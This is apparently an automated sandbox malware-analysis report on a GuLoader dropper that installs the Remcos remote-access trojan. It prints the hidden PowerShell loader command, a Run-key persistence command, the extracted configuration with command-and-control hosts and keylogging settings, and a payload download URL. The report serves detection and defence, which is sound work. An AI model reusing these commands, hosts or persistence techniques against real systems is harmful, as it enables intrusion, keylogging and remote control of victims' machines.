Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zR4aIjCuRs.exe

Overview

General Information

Sample name:zR4aIjCuRs.exe
Analysis ID:1526565
MD5:02f086fb54d58bf17b51564b34166f5e
SHA1:6ad69c9bdafb1a4ca5c0d15836b3e0abdd0a1e62
SHA256:2ac935868a1f972e5a036986147051402e1b656a5ac9ac4b8ca15252f14e15fd
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Powershell drops PE file
Suspicious powershell command line found
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64native
  • zR4aIjCuRs.exe (PID: 7948 cmdline: "C:\Users\user\Desktop\zR4aIjCuRs.exe" MD5: 02F086FB54D58BF17B51564B34166F5E)
    • powershell.exe (PID: 7872 cmdline: "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • msiexec.exe (PID: 8020 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6448 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1264 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • cmd.exe (PID: 7368 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • reg.exe (PID: 6020 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • WerFault.exe (PID: 4512 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 2324 MD5: 40A149513D721F096DDF50C04DA2F01F)
        • WerFault.exe (PID: 2516 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 1068 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "q92harbu03.duckdns.org:3980:0janbours92harbu04.duckdns.org:3981:1janbours92harbu007.duckdns.org:3981:1", "Assigned name": "MANIFESTWEALTHS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-MK0QHY", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000002.00000002.274416296042.000000000A9BD000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 1 entries

              System Summary

              barindex
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6020, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tragacanth
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7368, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", ProcessId: 6020, ProcessName: reg.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 85.120.16.93, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1264, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49768
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7872, TargetFilename: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\syswow64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1264, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", ProcessId: 7368, ProcessName: cmd.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) ", CommandLine: "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zR4aIjCuRs.exe", ParentImage: C:\Users\user\Desktop\zR4aIjCuRs.exe, ParentProcessId: 7948, ParentProcessName: zR4aIjCuRs.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) ", ProcessId: 7872, ProcessName: powershell.exe

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 1264, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-06T11:47:10.534594+020020327761Malware Command and Control Activity Detected192.168.11.2049769192.169.69.263980TCP
              2024-10-06T11:47:33.265040+020020327761Malware Command and Control Activity Detected192.168.11.2049773192.169.69.263980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-06T11:47:04.196262+020028032702Potentially Bad Traffic192.168.11.204976885.120.16.93443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "q92harbu03.duckdns.org:3980:0janbours92harbu04.duckdns.org:3981:1janbours92harbu007.duckdns.org:3981:1", "Assigned name": "MANIFESTWEALTHS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-MK0QHY", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: janbours92harbu04.duckdns.orgVirustotal: Detection: 6%Perma Link
              Source: janbours92harbu03.duckdns.orgVirustotal: Detection: 9%Perma Link
              Source: http://pesterbdd.com/images/Pester.png4Virustotal: Detection: 10%Perma Link
              Source: http://pesterbdd.com/images/Pester.pngVirustotal: Detection: 9%Perma Link
              Source: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exeReversingLabs: Detection: 79%
              Source: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exeVirustotal: Detection: 69%Perma Link
              Source: zR4aIjCuRs.exeReversingLabs: Detection: 79%
              Source: zR4aIjCuRs.exeVirustotal: Detection: 69%Perma Link
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1264, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: zR4aIjCuRs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 85.120.16.93:443 -> 192.168.11.20:49768 version: TLS 1.2
              Source: zR4aIjCuRs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: CallSite.Targetore.pdb|j source: powershell.exe, 00000002.00000002.274414428126.0000000008AB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.274408791125.000000000742D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.274412829387.00000000088DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.274412829387.00000000088DF000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\determinationens\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\Jump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.11.20:49769 -> 192.169.69.26:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.11.20:49773 -> 192.169.69.26:3980
              Source: Malware configuration extractorURLs: q92harbu03.duckdns.org
              Source: unknownDNS query: name: janbours92harbu04.duckdns.org
              Source: unknownDNS query: name: janbours92harbu03.duckdns.org
              Source: unknownDNS query: name: janbours92harbu007.duckdns.org
              Source: global trafficTCP traffic: 192.168.11.20:49770 -> 45.74.58.7:3981
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49768 -> 85.120.16.93:443
              Source: global trafficHTTP traffic detected: GET /images/vnlXriHFWaBU97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: simonastolerciuc.roCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /images/vnlXriHFWaBU97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: simonastolerciuc.roCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: simonastolerciuc.ro
              Source: global trafficDNS traffic detected: DNS query: janbours92harbu03.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: janbours92harbu04.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: janbours92harbu007.duckdns.org
              Source: powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: powershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
              Source: zR4aIjCuRs.exe, zR4aIjCuRs.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
              Source: powershell.exe, 00000002.00000002.274399089002.0000000004D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
              Source: powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
              Source: powershell.exe, 00000002.00000002.274399089002.0000000004D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
              Source: powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: msiexec.exe, 00000006.00000002.274580776368.00000000069ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simonastolerciuc.ro/
              Source: msiexec.exe, 00000006.00000002.274580776368.00000000069ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simonastolerciuc.ro/M
              Source: msiexec.exe, 00000006.00000002.274580776368.00000000069C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simonastolerciuc.ro/images/vnlXriHFWaBU97.bin
              Source: msiexec.exe, 00000006.00000002.274580776368.00000000069C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simonastolerciuc.ro/images/vnlXriHFWaBU97.binqH
              Source: msiexec.exe, 00000006.00000002.274587858838.00000000224B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://simonastolerciuc.ro/images/vnlXriHFWaBU97.binreinsEsrblog.ervadegato.com.br/vnlXriHFWaBU97.b
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownHTTPS traffic detected: 85.120.16.93:443 -> 192.168.11.20:49768 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405461

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1264, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exeJump to dropped file
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeFile created: C:\Windows\resources\0409Jump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_00406B150_2_00406B15
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_004072EC0_2_004072EC
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_00404C9E0_2_00404C9E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0305EAF02_2_0305EAF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0305EAE02_2_0305EAE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_030599A82_2_030599A8
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 2324
              Source: zR4aIjCuRs.exe, 00000000.00000000.273486426028.000000000047F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameemblem cytocyst.exe< vs zR4aIjCuRs.exe
              Source: zR4aIjCuRs.exeBinary or memory string: OriginalFilenameemblem cytocyst.exe< vs zR4aIjCuRs.exe
              Source: zR4aIjCuRs.exe.2.drBinary or memory string: OriginalFilenameemblem cytocyst.exe< vs zR4aIjCuRs.exe
              Source: zR4aIjCuRs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
